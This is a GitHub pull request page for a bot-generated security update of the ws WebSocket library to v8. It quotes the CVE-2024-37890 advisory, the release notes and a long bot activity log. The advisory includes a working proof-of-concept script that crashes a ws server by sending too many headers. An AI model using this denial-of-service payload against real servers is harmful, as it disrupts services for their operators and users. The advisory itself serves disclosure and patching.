Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

chore(deps): update dependency ws to v8 [security] #7595

Open
wants to merge 1 commit into
base: develop
Choose a base branch
from

Conversation

live-github-bot[bot]
Copy link
Contributor

@live-github-bot live-github-bot bot commented Aug 13, 2024

This PR contains the following updates:

Package Type Update Change
ws devDependencies major 7 -> 8
ws dependencies minor 8.17.1 -> 8.18.0

GitHub Vulnerability Alerts

CVE-2024-37890

Impact

A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Patches

The vulnerability was fixed in [email protected] (websockets/ws@e55e510) and backported to [email protected] (websockets/ws@22c2876), [email protected] (websockets/ws@eeb76d3), and [email protected] (websockets/ws@4abd8f6)

Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

  1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
  2. Set server.maxHeadersCount to 0 so that no limit is applied.

Credits

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

References


Release Notes

websockets/ws (ws)

v8.0.0

Compare Source

Breaking changes

  • The WebSocket constructor now throws a SyntaxError if any of the
    subprotocol names are invalid or duplicated (0aecf0c).

  • The server now aborts the opening handshake if an invalid
    Sec-WebSocket-Protocol header field value is received (1877dde).

  • The protocols argument of handleProtocols hook is no longer an Array but
    a Set (1877dde).

  • The opening handshake is now aborted if the Sec-WebSocket-Extensions header
    field value is empty or it begins or ends with a white space (e814110).

  • Dropped support for Node.js < 10.0.0 (552b506).

  • The WebSocket constructor now throws a SyntaxError if the connection URL
    contains a fragment identifier or if the URL's protocol is not one of 'ws:',
    'wss:', or 'ws+unix:' (ebea038).

  • Text messages and close reasons are no longer decoded to strings. They are
    passed as Buffers to the listeners of their respective events. The listeners
    of the 'message' event now take a boolean argument specifying whether or not
    the message is binary (e173423).

    Existing code can be migrated by decoding the buffer explicitly.

    websocket.on('message', function message(data, isBinary) {
      const message = isBinary ? data : data.toString();
      // Continue as before.
    });
    
    websocket.on('close', function close(code, data) {
      const reason = data.toString();
      // Continue as before.
    });
  • The package now uses an ES module wrapper (78adf5f).

  • WebSocketServer.prototype.close() no longer closes existing connections
    (df7de57).

    Existing code can be migrated by closing the connections manually.

    websocketServer.close();
    for (const ws of websocketServer.clients) {
      ws.terminate();
    }
  • The callback of WebSocketServer.prototype.close() is now called with an
    error if the server is already closed (abde9cf).

  • WebSocket.prototype.addEventListener() is now a noop if the type argument
    is not one of 'close', 'error', 'message', or 'open' (9558ed1).

  • WebSocket.prototype.removeEventListener() now only removes listeners added
    with WebSocket.prototype.addEventListener() and only one at time (ea95d9c).

  • The value of the onclose, onerror, onmessage, and onopen properties is
    now null if the respective event handler is not set (6756cf5).

  • The OpenEvent class has been removed (21e6500).

Bug fixes

  • The event listeners added via handler properties are now independent from the
    event listeners added with WebSocket.prototype.addEventListener()
    (0b21c03).

Configuration

📅 Schedule: Branch creation - "" in timezone Europe/Paris, Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Renovate Bot.

Copy link

vercel bot commented Aug 13, 2024

The latest updates on your projects. Learn more about Vercel for Git ↗︎

5 Skipped Deployments
Name Status Preview Comments Updated (UTC)
ledger-live-docs ⬜️ Ignored (Inspect) Visit Preview Dec 13, 2024 11:09pm
ledger-live-github-bot ⬜️ Ignored (Inspect) Visit Preview Dec 13, 2024 11:09pm
native-ui-storybook ⬜️ Ignored (Inspect) Visit Preview Dec 13, 2024 11:09pm
react-ui-storybook ⬜️ Ignored (Inspect) Visit Preview Dec 13, 2024 11:09pm
web-tools ⬜️ Ignored (Inspect) Visit Preview Dec 13, 2024 11:09pm

Copy link

socket-security bot commented Aug 13, 2024

Removed dependencies detected. Learn more about Socket for GitHub ↗︎

🚮 Removed packages: npm/[email protected]

View full report↗︎

@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 87f790d to a2e74a9 Compare August 14, 2024 22:06
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from a2e74a9 to b37c1c5 Compare August 14, 2024 22:14
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from b37c1c5 to 3bc15be Compare August 14, 2024 22:25
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 3bc15be to 2819415 Compare August 14, 2024 22:34
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 2819415 to 412337d Compare August 14, 2024 22:42
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 412337d to 63cba8c Compare August 14, 2024 22:48
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 63cba8c to 944b294 Compare August 14, 2024 22:55
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 944b294 to 689a0ce Compare August 14, 2024 23:01
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 14, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 689a0ce to da11ebc Compare August 15, 2024 22:05
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 15, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from da11ebc to 4f03efb Compare August 15, 2024 22:14
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Aug 15, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 4f03efb to dfc427a Compare August 15, 2024 22:25
@live-github-bot live-github-bot bot added the common Has changes in live-common label Aug 15, 2024
@live-github-bot live-github-bot bot added the common Has changes in live-common label Dec 12, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from be8c5e0 to 1b8e488 Compare December 12, 2024 22:54
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Dec 12, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 1b8e488 to ff47f2c Compare December 12, 2024 23:01
@live-github-bot live-github-bot bot added the common Has changes in live-common label Dec 12, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from ff47f2c to 43b737f Compare December 12, 2024 23:10
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Dec 12, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 43b737f to a33e3a9 Compare December 13, 2024 22:06
@live-github-bot live-github-bot bot added the common Has changes in live-common label Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from a33e3a9 to f076750 Compare December 13, 2024 22:15
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from f076750 to 6cc7038 Compare December 13, 2024 22:28
@live-github-bot live-github-bot bot added the common Has changes in live-common label Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 6cc7038 to 912bd0b Compare December 13, 2024 22:38
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 912bd0b to dbdf2b7 Compare December 13, 2024 22:47
@live-github-bot live-github-bot bot added the common Has changes in live-common label Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from dbdf2b7 to 6c33580 Compare December 13, 2024 22:53
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from 6c33580 to d7190c1 Compare December 13, 2024 23:00
@live-github-bot live-github-bot bot added the common Has changes in live-common label Dec 13, 2024
@live-github-bot live-github-bot bot force-pushed the renovate/npm-ws-vulnerability branch from d7190c1 to c0c3db7 Compare December 13, 2024 23:08
@live-github-bot live-github-bot bot removed the common Has changes in live-common label Dec 13, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

Successfully merging this pull request may close these issues.

0 participants